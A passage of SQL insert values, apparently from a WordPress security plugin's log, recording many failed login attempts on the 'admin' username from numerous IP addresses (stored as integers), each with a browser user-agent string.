(101493, 1497815065.085874, 1, 'loginFailValidUsername', 'admin', 1, 1124568033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101492, 1497814093.294681, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101491, 1497811698.857675, 1, 'loginFailValidUsername', 'admin', 1, 608746987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101490, 1497811697.110482, 1, 'loginFailValidUsername', 'admin', 1, 608746987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101489, 1497810104.167453, 1, 'loginFailValidUsername', 'admin', 1, 2872932610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101488, 1497810101.895573, 1, 'loginFailValidUsername', 'admin', 1, 2872932610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101487, 1497808525.462667, 1, 'loginFailValidUsername', 'admin', 1, 3250631515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101486, 1497808524.431158, 1, 'loginFailValidUsername', 'admin', 1, 3250631515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101485, 1497807962.532566, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101484, 1497806918.371756, 1, 'loginFailValidUsername', 'admin', 1, 1733213953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101483, 1497806916.925349, 1, 'loginFailValidUsername', 'admin', 1, 1733213953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101482, 1497804201.607960, 1, 'loginFailValidUsername', 'admin', 1, 1135341868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101481, 1497804200.403701, 1, 'loginFailValidUsername', 'admin', 1, 1135341868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101480, 1497802197.912357, 1, 'loginFailValidUsername', 'admin', 1, 3386038149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101479, 1497802196.376386, 1, 'loginFailValidUsername', 'admin', 1, 3386038149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101478, 1497801793.888975, 1, 'loginFailValidUsername', 'admin', 1, 1569717432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101477, 1497801792.863130, 1, 'loginFailValidUsername', 'admin', 1, 1569717432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101476, 1497801680.270565, 1, 'loginFailValidUsername', 'admin', 1, 2090188641, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101475, 1497801677.969341, 1, 'loginFailValidUsername', 'admin', 1, 2090188641, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101474, 1497801662.359944, 1, 'loginFailValidUsername', 'admin', 1, 702586352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101473, 1497801661.322948, 1, 'loginFailValidUsername', 'admin', 1, 702586352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101472, 1497800959.486297, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101471, 1497799446.777272, 1, 'loginFailValidUsername', 'admin', 1, 850344114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101470, 1497799444.641139, 1, 'loginFailValidUsername', 'admin', 1, 850344114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101469, 1497798449.392004, 1, 'loginFailValidUsername', 'admin', 1, 2945382205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101468, 1497798447.827548, 1, 'loginFailValidUsername', 'admin', 1, 2945382205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101467, 1497797538.840802, 1, 'loginFailValidUsername', 'admin', 1, 2997788116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101466, 1497797537.843903, 1, 'loginFailValidUsername', 'admin', 1, 2997788116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101465, 1497795808.051652, 1, 'loginFailValidUsername', 'admin', 1, 1293700813, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101464, 1497793166.706893, 1, 'loginFailValidUsername', 'admin', 1, 3680280345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101463, 1497793164.998783, 1, 'loginFailValidUsername', 'admin', 1, 3680280345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101462, 1497793040.593451, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101461, 1497792962.286029, 1, 'loginFailValidUsername', 'admin', 1, 657671819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101460, 1497792960.895536, 1, 'loginFailValidUsername', 'admin', 1, 657671819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101459, 1497792073.985796, 1, 'loginFailValidUsername', 'admin', 1, 2979849631, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101458, 1497789746.422211, 1, 'loginFailValidUsername', 'admin', 1, 3583324965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101457, 1497787602.223355, 1, 'loginFailValidUsername', 'admin', 1, 2523639257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101456, 1497787600.793425, 1, 'loginFailValidUsername', 'admin', 1, 2523639257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101455, 1497787453.359113, 1, 'loginFailValidUsername', 'admin', 1, 1920809324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101454, 1497787451.659746, 1, 'loginFailValidUsername', 'admin', 1, 1920809324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101453, 1497786852.621116, 1, 'loginFailValidUsername', 'admin', 1, 3109115678, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101452, 1497786851.496011, 1, 'loginFailValidUsername', 'admin', 1, 3109115678, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101451, 1497783196.664817, 1, 'loginFailValidUsername', 'admin', 1, 2982286323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101450, 1497783195.189090, 1, 'loginFailValidUsername', 'admin', 1, 2982286323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101449, 1497782492.080132, 1, 'loginFailValidUsername', 'admin', 1, 3698057776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101448, 1497782490.648076, 1, 'loginFailValidUsername', 'admin', 1, 3698057776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101447, 1497781902.746350, 1, 'loginFailValidUsername', 'admin', 1, 3318955358, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101446, 1497778549.765837, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101445, 1497777843.012826, 1, 'loginFailValidUsername', 'admin', 1, 1742943281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101444, 1497777841.364800, 1, 'loginFailValidUsername', 'admin', 1, 1742943281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101443, 1497777760.567832, 1, 'loginFailValidUsername', 'admin', 1, 762606085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101442, 1497777759.292479, 1, 'loginFailValidUsername', 'admin', 1, 762606085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101441, 1497777548.225908, 1, 'loginFailValidUsername', 'admin', 1, 247518067, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101440, 1497777546.628659, 1, 'loginFailValidUsername', 'admin', 1, 247518067, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101439, 1497775806.600342, 1, 'loginFailValidUsername', 'admin', 1, 1892043087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101438, 1497771536.671817, 1, 'loginFailValidUsername', 'admin', 1, 1979473355, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101437, 1497771534.914945, 1, 'loginFailValidUsername', 'admin', 1, 1979473355, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101436, 1497771327.784496, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101435, 1497770023.282022, 1, 'loginFailValidUsername', 'admin', 1, 1539529701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101434, 1497770022.272256, 1, 'loginFailValidUsername', 'admin', 1, 1539529701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101433, 1497768981.754121, 1, 'loginFailValidUsername', 'admin', 1, 1890377347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101432, 1497768980.296641, 1, 'loginFailValidUsername', 'admin', 1, 1890377347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101431, 1497768413.322731, 1, 'loginFailValidUsername', 'admin', 1, 704366584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101430, 1497763615.567274, 1, 'loginFailValidUsername', 'admin', 1, 1705472359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101429, 1497763551.992727, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101428, 1497762304.871171, 1, 'loginFailValidUsername', 'admin', 1, 697210739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101427, 1497762303.735535, 1, 'loginFailValidUsername', 'admin', 1, 697210739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101426, 1497762274.221311, 1, 'loginFailValidUsername', 'admin', 1, 1234445276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101425, 1497762273.092301, 1, 'loginFailValidUsername', 'admin', 1, 1234445276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101424, 1497760996.342732, 1, 'loginFailValidUsername', 'admin', 1, 1600620828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101423, 1497760995.163889, 1, 'loginFailValidUsername', 'admin', 1, 1600620828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101422, 1497759021.171303, 1, 'loginFailValidUsername', 'admin', 1, 29000538, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101421, 1497759019.972660, 1, 'loginFailValidUsername', 'admin', 1, 29000538, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101420, 1497756145.943120, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101419, 1497754528.191642, 1, 'loginFailValidUsername', 'admin', 1, 1298547324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101418, 1497754527.216211, 1, 'loginFailValidUsername', 'admin', 1, 1298547324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101417, 1497748772.388455, 1, 'loginFailValidUsername', 'admin', 1, 1591283272, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101416, 1497748771.291372, 1, 'loginFailValidUsername', 'admin', 1, 1591283272, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101415, 1497748547.102692, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101414, 1497745332.812805, 1, 'loginFailValidUsername', 'admin', 1, 693261352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101413, 1497745327.389403, 1, 'loginFailValidUsername', 'admin', 1, 693261352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101412, 1497745222.819074, 1, 'loginFailValidUsername', 'admin', 1, 1516638931, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101411, 1497744336.105335, 1, 'loginFailValidUsername', 'admin', 1, 3141232515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101410, 1497744334.293423, 1, 'loginFailValidUsername', 'admin', 1, 3141232515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101409, 1497742195.926239, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101408, 1497741033.572477, 1, 'loginFailValidUsername', 'admin', 1, 3142950530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101407, 1497741032.128805, 1, 'loginFailValidUsername', 'admin', 1, 3142950530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101406, 1497740759.012892, 1, 'loginFailValidUsername', 'admin', 1, 3125698943, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101405, 1497740757.560320, 1, 'loginFailValidUsername', 'admin', 1, 3125698943, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101404, 1497736250.944005, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101403, 1497730353.187887, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101402, 1497726285.668327, 1, 'loginFailValidUsername', 'admin', 1, 2588094137, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101401, 1497726283.643142, 1, 'loginFailValidUsername', 'admin', 1, 2588094137, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101400, 1497724220.740746, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101399, 1497723937.166895, 1, 'loginFailValidUsername', 'admin', 1, 2975005806, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101398, 1497722476.298526, 1, 'loginFailValidUsername', 'admin', 1, 2441280661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101397, 1497722475.256973, 1, 'loginFailValidUsername', 'admin', 1, 2441280661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101396, 1497721532.457588, 1, 'loginFailValidUsername', 'admin', 1, 2959119668, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101395, 1497721531.481066, 1, 'loginFailValidUsername', 'admin', 1, 2959119668, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101394, 1497718327.969654, 1, 'loginFailValidUsername', 'admin', 1, 995870782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101393, 1497717717.754712, 1, 'loginFailValidUsername', 'admin', 1, 1411143507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101392, 1497717716.805645, 1, 'loginFailValidUsername', 'admin', 1, 1411143507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101391, 1497716880.292059, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101390, 1497712987.073536, 1, 'loginFailValidUsername', 'admin', 1, 1816379950, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101389, 1497712985.907779, 1, 'loginFailValidUsername', 'admin', 1, 1816379950, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101388, 1497711024.386066, 1, 'loginFailValidUsername', 'admin', 1, 1330836365, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101387, 1497711023.427334, 1, 'loginFailValidUsername', 'admin', 1, 1330836365, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101386, 1497709036.464875, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101385, 1497708256.198436, 1, 'loginFailValidUsername', 'admin', 1, 995647581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101384, 1497708254.204235, 1, 'loginFailValidUsername', 'admin', 1, 995647581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101383, 1497707531.418068, 1, 'loginFailValidUsername', 'admin', 1, 3115319218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101382, 1497706885.929079, 1, 'loginFailValidUsername', 'admin', 1, 3320035317, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101381, 1497706884.617598, 1, 'loginFailValidUsername', 'admin', 1, 3320035317, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101380, 1497702817.740839, 1, 'loginFailValidUsername', 'admin', 1, 1521628389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101379, 1497701393.074002, 1, 'loginFailValidUsername', 'admin', 1, 248125723, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101378, 1497701390.804017, 1, 'loginFailValidUsername', 'admin', 1, 248125723, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101377, 1497700699.714808, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101376, 1497696912.804155, 1, 'loginFailValidUsername', 'admin', 1, 1733447443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101375, 1497696911.569883, 1, 'loginFailValidUsername', 'admin', 1, 1733447443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101374, 1497693020.368685, 1, 'loginFailValidUsername', 'admin', 1, 460953403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101373, 1497693018.971227, 1, 'loginFailValidUsername', 'admin', 1, 460953403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101372, 1497692937.853916, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101371, 1497692810.328503, 1, 'loginFailValidUsername', 'admin', 1, 1979195372, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101370, 1497692808.784430, 1, 'loginFailValidUsername', 'admin', 1, 1979195372, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101369, 1497692804.995367, 1, 'loginFailValidUsername', 'admin', 1, 1581440851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101368, 1497692803.309741, 1, 'loginFailValidUsername', 'admin', 1, 1581440851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101367, 1497689713.349287, 1, 'loginFailValidUsername', 'admin', 1, 2945257711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101366, 1497689711.810171, 1, 'loginFailValidUsername', 'admin', 1, 2945257711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101365, 1497688593.934547, 1, 'loginFailValidUsername', 'admin', 1, 418884769, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101364, 1497686646.350765, 1, 'loginFailValidUsername', 'admin', 1, 3291887407, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; Zune 3.0; MSN Optimized;US)'),
(101363, 1497685847.419204, 1, 'loginFailValidUsername', 'admin', 1, 657627066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101362, 1497685439.516710, 1, 'loginFailValidUsername', 'admin', 1, 1507333940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101361, 1497685438.523651, 1, 'loginFailValidUsername', 'admin', 1, 1507333940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101360, 1497685100.671789, 1, 'loginFailValidUsername', 'admin', 1, 3585148073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101359, 1497685099.614603, 1, 'loginFailValidUsername', 'admin', 1, 3585148073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101358, 1497685035.479205, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101357, 1497684857.394276, 1, 'loginFailValidUsername', 'admin', 1, 3154288046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101356, 1497684046.269408, 1, 'loginFailValidUsername', 'admin', 1, 1742476650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101355, 1497684045.054885, 1, 'loginFailValidUsername', 'admin', 1, 1742476650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101354, 1497681893.950254, 1, 'loginFailValidUsername', 'admin', 1, 2083059268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101353, 1497681892.718963, 1, 'loginFailValidUsername', 'admin', 1, 2083059268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101352, 1497681773.177427, 1, 'loginFailValidUsername', 'admin', 1, 3070050096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101351, 1497681771.494759, 1, 'loginFailValidUsername', 'admin', 1, 3070050096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101350, 1497680221.301512, 1, 'loginFailValidUsername', 'admin', 1, 699849360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101349, 1497680219.860836, 1, 'loginFailValidUsername', 'admin', 1, 699849360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101348, 1497677735.633797, 1, 'loginFailValidUsername', 'admin', 1, 2875375532, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101347, 1497677497.285854, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101346, 1497677119.346923, 1, 'loginFailValidUsername', 'admin', 1, 1442374564, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(101345, 1497675393.986842, 1, 'loginFailValidUsername', 'admin', 1, 831611257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101344, 1497675392.292607, 1, 'loginFailValidUsername', 'admin', 1, 831611257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
